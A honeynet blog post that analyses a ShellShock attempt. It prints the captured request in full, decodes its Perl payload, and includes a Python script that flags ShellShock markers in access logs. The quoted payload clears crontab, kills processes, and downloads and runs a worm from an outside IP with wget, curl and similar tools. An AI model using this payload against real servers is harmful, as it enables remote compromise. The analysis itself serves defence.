Tailored Cyber Security.

Batman Vs Superman… the malware

I recently got my honeynet configured and running. The honeypots have been pulling in some pretty cool specimens. However, today I had something new pop up that I’ve never seen… on my honeynet manager. So, yay, they figured me out. Alas, their attack was unsuccessful… I think. Let’s get into it.

First, on April 29th there were 198 attempts to execute a perl script on my honeynet manager. They looked like this:

31.184.195.114 - - [29/Apr/2016:21:48:26 -0400] "GET /phppath/php-cgi HTTP/1.1" 404 209 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir bat-mobile ; cd /tmp/bat-mobile ; wget http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman ; lwp-download http://31.184.194.100/batman-vs-superman ; fetch http://31.184.194.100/batman-vs-superman ; curl -O http://31.184.194.100/batman-vs-superman ; perl batman-vs-superman;cd /tmp/;rm -rf bat*\x22);'"

Let’s break that down to make a little sense of it. The first field is the source IP, which is in Russia… http://geoiplookup.net/ip/31.184.195.114. I’m not trying to accuse Russia of doing this, because the server I’m writing this on is in Canada while I’m not. On top of that, the malware is primarily written in Portuguese, along with some comments in English. Quite obviously, the next field is a time stamp showing when the activity occurred. Now, the rest of it is the real attack.

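First off, the “() { :;};” part is a telltale sign of ShellShock. It sits in the User-Agent field of the request, and the idea is to kick off the exploit by sending this “magic string” to the server so that a vulnerable bash treats it as a function definition and executes whatever follows, which here is perl. Now, as far as the perl goes…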

/usr/bin/perl -e '
print "Content-Type: text/plain\r\n\r\nXSUCCESS!";
system(
"crontab -r;
killall -9 php perl;
cd /tmp/ ;
mkdir bat-mobile ;
cd /tmp/bat-mobile ;
wget http://31.184.194.100/batman-vs-superman ;
perl batman-vs-superman ;
lwp-download http://31.184.194.100/batman-vs-superman ;
fetch http://31.184.194.100/batman-vs-superman ;
curl -O http://31.184.194.100/batman-vs-superman ;
perl batman-vs-superman;
cd /tmp/;
rm -rf bat*"
);'

I’ve done some decoding for you. Simply put, that big blob of attack is using PHP to launch the above “perl” script. I say “perl” because it just leverages the system call to execute bash commands. Either way, it deletes the current user’s crontab, terminates php and perl processes, and then magic ensues. Actually it’s not magic at all. They create a folder called bat-mobile in the tmp folder to store their malware. The malware, cleverly named “batman-vs-superman”, is downloaded (or at least the download is attempted) in a few ways, and then it attempts to execute. Finally, it deletes everything it made and allows batman-vs-superman to run.
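One way to flag and decode entries like the one above in an access log, as an added example that is not code from the original post: it looks for the `() {` marker in the client-supplied fields, reverses the `\xHH` escapes, and lists the download URLs named in the payload. The function names, regexes and sample lines (documentation-range addresses, placeholder file name) are constructed for illustration.

```python
import re

# Combined log format: src ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ '
                    + QUOTED + ' ' + QUOTED + r'\s*$')
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')   # value opens a bash function definition
URL_RE = re.compile(r'https?://[^\s;"\']+')
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')


def decode_escapes(value):
    """Turn the server's \\xHH log escapes back into the characters the client sent."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), value)


def scan(lines):
    """Return one finding per log line carrying the ShellShock marker in a client field."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        src, ts, request, status, referer, agent = m.groups()
        for name, raw in (("request", request), ("referer", referer), ("user-agent", agent)):
            value = decode_escapes(raw)
            if SHELLSHOCK_RE.search(value):
                # dict.fromkeys keeps first-seen order while dropping repeated URLs
                urls = list(dict.fromkeys(URL_RE.findall(value)))
                findings.append({"src": src, "time": ts, "field": name,
                                 "status": int(status), "payload": value, "urls": urls})
                break
    return findings


# Constructed sample lines (documentation-range addresses, placeholder file name)
SAMPLE = [
    '192.0.2.10 - - [29/Apr/2016:21:48:26 -0400] "GET /phppath/php-cgi HTTP/1.1" 404 209 "-" '
    '"() { :;};/usr/bin/perl -e \'system(\\x22cd /tmp/ ; wget http://198.51.100.7/sample ; '
    'curl -O http://198.51.100.7/sample\\x22);\'"',
    '192.0.2.10 - - [29/Apr/2016:21:48:27 -0400] "GET /phppath/php-cgi HTTP/1.1" 404 209 "-" '
    '"() { :;};/usr/bin/perl -e \'system(\\x22wget http://198.51.100.7/sample\\x22);\'"',
    '203.0.113.5 - - [29/Apr/2016:21:50:02 -0400] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        # The status shows how the server answered; 404 means the requested path was not found
        print(hit["src"], hit["time"], hit["status"], hit["field"], hit["urls"])
```

The status code in each finding is worth keeping next to the payload, since it separates requests that hit a missing path from ones a handler actually answered.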

I won’t post batman-vs-superman here but I do have a copy of it. I maybe downloaded it using one of the lines from above. After some perusing through the code it looks like a new version of the Santy worm that’s been in circulation for over a decade. However, it appears to be beefed up pretty nicely. It connects to an IRC server that it uses for command and control.

It appears that the coder(s) utilized a couple of segments of code from around the internet. For example, one of the English portions I found was a verbatim copy-and-paste from an example unrelated to malware that I found on the internet. Long story short, it looks like a cool piece of code but I don’t think it’s anything special. Especially because it was shotgunned at my server almost 200 times in a second.

There have been a few more interesting attacks. It looks like “The Office of the President of Berkeley” has been sending shellcode at my server… please stop. Also, Michigan State is back at hitting my honeypots. Keep it up Spartans!

Bottom line:

Home users are safe. If you have a website then I really hope you’ve covered yourself since ShellShock; if not, then get after it. There are a handful of spots to stop this attack before, during, and after infection. If you need specifics then feel free to contact me!
